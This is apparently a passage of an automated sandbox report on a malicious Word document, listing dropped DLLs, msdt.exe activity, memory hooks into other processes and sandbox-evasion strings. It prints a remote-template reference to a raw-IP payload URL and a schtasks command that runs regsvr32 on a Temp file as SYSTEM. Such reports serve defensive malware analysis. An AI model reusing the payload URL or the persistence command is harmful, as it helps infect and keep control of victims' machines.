                            Source: Binary string: amstream.pdb source: explorer.exe, 00000020.00000003.675706177.0000000005221000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.674870677.0000000004DAB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.678475892.0000000004D51000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: amstream.pdbGCTL source: explorer.exe, 00000020.00000003.675706177.0000000005221000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.674870677.0000000004DAB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.678475892.0000000004D51000.00000004.00000800.00020000.00000000.sdmp
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 27_2_049AB02E push ebx; ret
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 27_2_049901B0 pushad ; iretd
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 27_2_049AAD7C push cs; iretd
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 27_2_049AAE7E push cs; iretd
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 27_2_049ACB5D push esi; iretd
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 28_2_042BB02E push ebx; ret
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 28_2_042BAD7C push cs; iretd
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 28_2_042A01B0 pushad ; iretd
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 28_2_042BAE7E push cs; iretd
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 28_2_042BCB5D push esi; iretd
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 28_2_00830790 push edx; ret
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 28_2_0082A002 push cs; iretd
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 28_2_0082A1B2 push ebx; ret
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 28_2_00810334 pushad ; iretd
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 28_2_0082BCE1 push esi; iretd
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 28_2_0082E508 pushad ; retf
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 28_2_0082E638 push edx; ret
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 28_2_00829F00 push cs; iretd
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 29_2_04B0B02E push ebx; ret
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 29_2_04AF01B0 pushad ; iretd
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 29_2_04B0AD7C push cs; iretd
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 29_2_04B0AE7E push cs; iretd
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 29_2_04B0CB5D push esi; iretd
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 29_2_04AC0790 push edx; ret
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 29_2_04ABBCE1 push esi; iretd
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 29_2_04ABE508 pushad ; retf
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 29_2_04ABE638 push edx; ret
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 29_2_04AB9F00 push cs; iretd
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 29_2_04ABA002 push cs; iretd
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 29_2_04ABA1B2 push ebx; ret
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 29_2_04AA0334 pushad ; iretd
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 27_2_0499EEBB LoadLibraryA,GetProcAddress,
                            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\asaommz3\asaommz3.cmdline
                            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i3ghm531\i3ghm531.cmdline
                            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\01rkp2ka\01rkp2ka.cmdline

                            Persistence and Installation Behavior

                            barindex
                            Contains an external reference to another file
                            Source: document.xml.relsExtracted files from sample: mhtml:http://185.234.247.119:80/123.res!http://185.234.247.119:80/123.res
                            Source: C:\Windows\SysWOW64\msdt.exeFile created: C:\Windows\Temp\SDIAG_301dfb23-3df4-4f23-8ed0-e1654355ec0c\DiagPackage.dllJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\i3ghm531\i3ghm531.dllJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\01rkp2ka\01rkp2ka.dllJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\asaommz3\asaommz3.dllJump to dropped file
                            Source: C:\Windows\SysWOW64\msdt.exeFile created: C:\Windows\Temp\SDIAG_301dfb23-3df4-4f23-8ed0-e1654355ec0c\en-US\DiagPackage.dll.muiJump to dropped file
                            Source: C:\Windows\SysWOW64\msdt.exeFile created: C:\Windows\Temp\SDIAG_301dfb23-3df4-4f23-8ed0-e1654355ec0c\DiagPackage.dllJump to dropped file
                            Source: C:\Windows\SysWOW64\msdt.exeFile created: C:\Windows\Temp\SDIAG_301dfb23-3df4-4f23-8ed0-e1654355ec0c\en-US\DiagPackage.dll.muiJump to dropped file

                            Boot Survival

                            barindex
                            Uses schtasks.exe or at.exe to add and modify task schedules
                            Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn swyghewz /tr "regsvr32.exe -s \"C:\Users\user\AppData\Local\Temp\t1.A\"" /SC ONCE /Z /ST 19:54 /ET 20:06

                            Hooking and other Techniques for Hiding and Protection

                            barindex
                            Overwrites code with unconditional jumps - possibly settings hooks in foreign process
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 4384 base: 90F380 value: E9 40 6E 67 02
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 2256 base: 90F380 value: E9 40 6E 55 02
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 5492 base: 90F380 value: E9 40 6E 5B 02
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXERegistry key monitored for changes: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX

                            Malware Analysis System Evasion

                            barindex
                            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                            Source: explorer.exe, 00000021.00000003.679709258.0000000003442000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE
                            Source: explorer.exe, 00000021.00000003.679671852.000000000343F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FRIDA-WINJECTOR-HELPER-32.EXE
                            Source: explorer.exe, 00000021.00000003.679671852.000000000343F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FRIDA-WINJECTOR-HELPER-64.EXE
                            Source: explorer.exe, 00000021.00000003.679671852.000000000343F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TCPDUMP.EXE5
                            Source: explorer.exe, 00000021.00000003.679671852.000000000343F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WINDUMP.EXE-
                            Source: explorer.exe, 00000021.00000003.679671852.000000000343F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TCPDUMP.EXE
                            Source: explorer.exe, 00000021.00000003.679671852.000000000343F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WINDUMP.EXE
                            Source: explorer.exe, 00000021.00000003.679671852.000000000343F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXE5
                            Source: explorer.exe, 00000021.00000003.679671852.000000000343F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FRIDA-WINJECTOR-HELPER-64.EXE5
                            Source: explorer.exe, 00000021.00000003.679671852.000000000343F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DUMPCAP.EXE2
                            Source: explorer.exe, 00000021.00000003.679709258.0000000003442000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE5
                            Source: explorer.exe, 00000021.00000003.679671852.000000000343F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FRIDA-WINJECTOR-HELPER-32.EXE5
                            Source: explorer.exe, 00000021.00000003.679671852.000000000343F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DUMPCAP.EXE
                            Source: explorer.exe, 00000021.00000003.679671852.000000000343F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXE
                            Source: explorer.exe, 00000021.00000003.679671852.000000000343F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FILEMON.EXE
                            Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5152Thread sleep count: 120 > 30
